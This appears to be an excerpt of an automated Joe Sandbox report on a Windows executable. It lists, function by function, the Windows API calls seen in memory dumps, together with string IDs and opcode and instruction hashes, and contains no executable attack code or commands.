                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 1577aec9b4e67e1384292f9718a075c063f37a754d8809ac3ca98e7c8162a23f
                                                          • Instruction ID: e4d1fc209a0e016ab44946f4e441094357ac7dd389b588fb2d1f038d8e25b05f
                                                          • Opcode Fuzzy Hash: 1577aec9b4e67e1384292f9718a075c063f37a754d8809ac3ca98e7c8162a23f
                                                          • Instruction Fuzzy Hash: A8210431904108BFDF16AB74CC86DFEB7A9DF05360F10452EF4659B2E1DB351D0A9610
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0037D51C
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • _memset.LIBCMT ref: 0034418D
                                                          • _wcscpy.LIBCMT ref: 003441E1
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003441F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: dfe71ae6cdc21c4ab5cb93911081c737da093ab91cfa49cd9fbac65f1203006a
                                                          • Instruction ID: 50aad418ced52e5ca7981b08d5b63db0a54e85e26e69fa8ee9f353eb5abc606c
                                                          • Opcode Fuzzy Hash: dfe71ae6cdc21c4ab5cb93911081c737da093ab91cfa49cd9fbac65f1203006a
                                                          • Instruction Fuzzy Hash: EA318171408704ABD723EB60DD45FDB77ECAF44310F10452EF5859A1A1EB74B648CB96
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B1962
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1988
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003B19B8
                                                          • InternetCloseHandle.WININET(00000000), ref: 003B19FF
                                                            • Part of subcall function 003B2599: GetLastError.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25AE
                                                            • Part of subcall function 003B2599: SetEvent.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: f51722bee96b5c809fec1d5d3a94b4442840f5e0a1dd73d9ec21a1fca614bea6
                                                          • Instruction ID: e2610c0f6316aa33f62a28bc95b73103c26c14fd72006fb3bf2e4443fe7827b0
                                                          • Opcode Fuzzy Hash: f51722bee96b5c809fec1d5d3a94b4442840f5e0a1dd73d9ec21a1fca614bea6
                                                          • Instruction Fuzzy Hash: 7B21A4B2500208BFE7239F60DCA5EFF77ADEB49748F10411AF605D6540EB25AE0597B1
                                                          APIs
                                                            • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                            • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                            • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C6493
                                                          • LoadLibraryW.KERNEL32(?), ref: 003C649A
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C64AF
                                                          • DestroyWindow.USER32(?), ref: 003C64B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                          • Instruction ID: 455af08027eb5428dc2c62fc56b4146c6c057413c649a6ac37a4a9e8cedb6086
                                                          • Opcode Fuzzy Hash: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                          • Instruction Fuzzy Hash: 81218871600609BFEF164E66DC82FBB37ADEB49364F11862DFA14D6190CB31EC91A760
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003A6E65
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6E98
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003A6EAA
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003A6EE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                          • Instruction ID: 0740605be03cceabda9d6fa0148fca16040c4b7b9c53db2302c18787e598e8ab
                                                          • Opcode Fuzzy Hash: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                          • Instruction Fuzzy Hash: A4217478600205AFDB229F29DD06E9A77F8EF56760F284A19FDA1D72D0DB709850CB50
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003A6F32
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6F64
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003A6F75
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003A6FAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                          • Instruction ID: f8011c6e23b60c2a39f162da6bde92580a61e6727edce4e51198fbe22193383a
                                                          • Opcode Fuzzy Hash: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                          • Instruction Fuzzy Hash: 3421B375604305AFDB229F69EC0AA9977E8EF56730F280A59FCB1E72D0D770A8508B50
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AACDE
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003AAD32
                                                          • __swprintf.LIBCMT ref: 003AAD4B
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,003CF910), ref: 003AAD89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 765859c5fabcf45c305b3e3481299b24d32b4f63ebba3083cbbbfc16e08a8c17
                                                          • Instruction ID: ca59820936eab2d62cf823ab3cefb6ef29b00c9d01f17c1da94ce702d356c8ca
                                                          • Opcode Fuzzy Hash: 765859c5fabcf45c305b3e3481299b24d32b4f63ebba3083cbbbfc16e08a8c17
                                                          • Instruction Fuzzy Hash: 34214135A00209AFCB11EFA5C985EEE7BF8EF49704B044069F509DF251DB31EA41CB61
                                                          APIs
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                            • Part of subcall function 0039A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0039A179
                                                            • Part of subcall function 0039A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A18C
                                                            • Part of subcall function 0039A15C: GetCurrentThreadId.KERNEL32 ref: 0039A193
                                                            • Part of subcall function 0039A15C: AttachThreadInput.USER32(00000000), ref: 0039A19A
                                                          • GetFocus.USER32 ref: 0039A334
                                                            • Part of subcall function 0039A1A5: GetParent.USER32(?), ref: 0039A1B3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039A37D
                                                          • EnumChildWindows.USER32(?,0039A3F5), ref: 0039A3A5
                                                          • __swprintf.LIBCMT ref: 0039A3BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: 17693a61bc691b01fde7e51c1c17873fa9be83b99f08f5acf6ff5c5787bc28fc
                                                          • Instruction ID: 21fc500ec757f651af5def1b038dfdb824529bf3e6399c37302dbc968de3f6db
                                                          • Opcode Fuzzy Hash: 17693a61bc691b01fde7e51c1c17873fa9be83b99f08f5acf6ff5c5787bc28fc
                                                          • Instruction Fuzzy Hash: B8117F756002096BDF12BF60DC86FEA37BDAF45700F004175F908AE252CB7069559BB1
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BED1B
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BED4B
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003BEE7E
                                                          • CloseHandle.KERNEL32(?), ref: 003BEEFF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 6e01c2cc804b6f2e1b602047458437887a458932df10ebc8ebefb27ca2e98c58
                                                          • Instruction ID: 70c22330120b7bb98df6ee52bc064c7e235bc88154d9cb704c9dbd344b22e41c
                                                          • Opcode Fuzzy Hash: 6e01c2cc804b6f2e1b602047458437887a458932df10ebc8ebefb27ca2e98c58
                                                          • Instruction Fuzzy Hash: 7D814F716043009FD721EF28C886BAAB7E5AF48714F15881DF995DF792DAB0AC408B91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction ID: 7e6b4515aa7fa0de77d19f116f42919a44128df6cce8051b8aba0565712d0c79
                                                          • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                                                          • Instruction Fuzzy Hash: 1051B230A00B06DBDB268F69C88466EB7B6AF41324F25C73DF8269A2D8D7719D50DB50
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0188
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C01C7
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003C020E
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 003C023A
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0247
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: f419a984da221e1e9cb04629c1b6148411160aac0c5636817161a8f72b9e0e13
                                                          • Instruction ID: 81bfaf09d582bc5914353c1b13e500d2061279ad9d417230d65d7a3a6d36cb00
                                                          • Opcode Fuzzy Hash: f419a984da221e1e9cb04629c1b6148411160aac0c5636817161a8f72b9e0e13
                                                          • Instruction Fuzzy Hash: 58514971208244EFD706EBA4C885F6AB7E9FF84714F04892DB5958B2A2DB31ED04DB52
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDA3B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003BDABE
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 003BDADA
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003BDB1B
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003BDB35
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: c4f79414447f48b4304bba11f44993fed3e6f6bb914247a269f52701ebd1952d
                                                          • Instruction ID: 779d667577825d717027c1ef23e3922c3b9b8bbf18cfe5f8a211b03e7ae5ebb4
                                                          • Opcode Fuzzy Hash: c4f79414447f48b4304bba11f44993fed3e6f6bb914247a269f52701ebd1952d
                                                          • Instruction Fuzzy Hash: 58512775A04205DFCB02EFA8C4849AEB7F9EF48314B158069E915AB712DB31AD45CF90
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003AE6AB
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003AE6D4
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003AE713
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003AE738
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003AE740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 21e982bd15e5631171aa0d92ded78441f49f99bd3aa9608dc8e8876107abe05e
                                                          • Instruction ID: 040d67543abc5bedb685d296147f342c71698d3e85d1b1f1645d6f3524a89bca
                                                          • Opcode Fuzzy Hash: 21e982bd15e5631171aa0d92ded78441f49f99bd3aa9608dc8e8876107abe05e
                                                          • Instruction Fuzzy Hash: 2051FA35A00605DFCB06EF64C981AAEBBF9EF49314B148499E849AF362CB31ED11DF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34bfe8077e7e09d03324b800ec33b6793345996852f99a4ff86f2dffd703c747
                                                          • Instruction ID: 8f49aea56ddf8c43fa69eabfb410ffa4e9f61604bca0f6c285d84813a0f6e2cb
                                                          • Opcode Fuzzy Hash: 34bfe8077e7e09d03324b800ec33b6793345996852f99a4ff86f2dffd703c747
                                                          • Instruction Fuzzy Hash: E5411735900A0CAFD712DF68CC45FA9BBA9EB09364F1A416DF916E72E0C730AD40DB51
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00342357
                                                          • ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 1ef3e6538e652bebe417aadc30427e538362b81b30ed43c7a97bdb7a2938d430
                                                          • Instruction ID: bb88c84577bd4fea19d3f1774375825364a6461c5411bcdb3f1f7825b2589400
                                                          • Opcode Fuzzy Hash: 1ef3e6538e652bebe417aadc30427e538362b81b30ed43c7a97bdb7a2938d430
                                                          • Instruction Fuzzy Hash: 79417135904115FFCF269F68C844EEABBB5FB05360F50836AF829AA291C7386D50DF91
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0039673D
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00396789
                                                          • TranslateMessage.USER32(?), ref: 003967B2
                                                          • DispatchMessageW.USER32(?), ref: 003967BC
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003967CB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 6d802e5f3439ef12e35011476c945b10decb368ca678fa8e8adbda87585fe998
                                                          • Instruction ID: b4da74902f8e6482ffc12e8f7db5fdd65cf9b9e32e7676b322233a83712266bf
                                                          • Opcode Fuzzy Hash: 6d802e5f3439ef12e35011476c945b10decb368ca678fa8e8adbda87585fe998
                                                          • Instruction Fuzzy Hash: 7031B031902606AFDF229BB08C4AFB77BECEB01308F150179E422D71A1E735A885DB64
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00398CF2
